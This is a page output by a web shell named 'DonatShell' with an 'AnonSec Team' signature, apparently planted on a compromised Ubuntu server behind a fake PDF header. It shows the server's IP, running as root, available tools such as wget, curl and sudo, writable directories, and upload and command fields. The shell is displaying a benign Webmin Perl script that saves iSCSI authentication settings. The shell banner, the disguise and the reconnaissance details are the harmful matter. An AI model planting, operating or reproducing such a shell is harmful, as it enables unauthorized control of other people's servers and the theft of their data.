%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.248
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/webmin/iscsi-client/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/webmin/iscsi-client/save_auth.cgi
#!/usr/bin/perl
# Save authentication options

use strict;
use warnings;
no warnings 'redefine';
no warnings 'uninitialized';
require './iscsi-client-lib.pl';
our (%text, %config, %in);
&ReadParse();
&lock_file($config{'initiator_file'});
&lock_file($config{'config_file'});
my $conf = &get_iscsi_config();
&error_setup($text{'auth_err'});

# Authentication method
&save_directive($conf, "node.session.auth.authmethod", $in{'method'});

# Login and password to iSCSI server
if ($in{'username_def'}) {
	&save_directive($conf, "node.session.auth.username", undef);
	&save_directive($conf, "node.session.auth.password", undef);
	}
else {
	$in{'username'} =~ /\S/ || &error($text{'auth_eusername'});
	$in{'password'} =~ /\S/ || &error($text{'auth_epassword'});
	&save_directive($conf, "node.session.auth.username", $in{'username'});
	&save_directive($conf, "node.session.auth.password", $in{'password'});
	}

# Login and password by the iSCSI server to the client
if ($in{'username_in_def'}) {
	&save_directive($conf, "node.session.auth.username_in", undef);
	&save_directive($conf, "node.session.auth.password_in", undef);
	}
else {
	$in{'username_in'} =~ /\S/ || &error($text{'auth_eusername_in'});
	$in{'password_in'} =~ /\S/ || &error($text{'auth_epassword_in'});
	&save_directive($conf, "node.session.auth.username_in",
			$in{'username_in'});
	&save_directive($conf, "node.session.auth.password_in",
			$in{'password_in'});
	}

# Authentication method
&save_directive($conf, "discovery.sendtargets.auth.authmethod", $in{'dmethod'});

# Discovery login and password to iSCSI server
if ($in{'dusername_def'}) {
	&save_directive($conf, "discovery.sendtargets.auth.username", undef);
	&save_directive($conf, "discovery.sendtargets.auth.password", undef);
	}
else {
	$in{'dusername'} =~ /\S/ || &error($text{'auth_edusername'});
	$in{'dpassword'} =~ /\S/ || &error($text{'auth_edpassword'});
	&save_directive($conf, "discovery.sendtargets.auth.username",
			$in{'dusername'});
	&save_directive($conf, "discovery.sendtargets.auth.password",
			$in{'dpassword'});
	}

# Discovery login and password by the iSCSI server to the client
if ($in{'dusername_in_def'}) {
	&save_directive($conf, "discovery.sendtargets.auth.username_in", undef);
	&save_directive($conf, "discovery.sendtargets.auth.password_in", undef);
	}
else {
	$in{'dusername_in'} =~ /\S/ || &error($text{'auth_edusername_in'});
	$in{'dpassword_in'} =~ /\S/ || &error($text{'auth_edpassword_in'});
	&save_directive($conf, "discovery.sendtargets.auth.username_in",
			$in{'dusername_in'});
	&save_directive($conf, "discovery.sendtargets.auth.password_in",
			$in{'dpassword_in'});
	}

# Initiator name
if ($in{'newname'}) {
	my $gen = &generate_initiator_name();
	$gen || &error($text{'auth_egen'});
	&save_initiator_name($gen);
	}
elsif ($in{'name'} ne &get_initiator_name()) {
	# Validate and save name
	$in{'name'} =~ /^[a-z0-9\.\-\:]+$/ && length($in{'name'}) <= 223 ||
		&error($text{'auth_ename'});
	&save_initiator_name($in{'name'});
	}

&flush_file_lines($config{'targets_file'});
&unlock_file($config{'config_file'});
&unlock_file($config{'initiator_file'});
&webmin_log("auth");
&redirect("");


Anon7 - 2022
AnonSec Team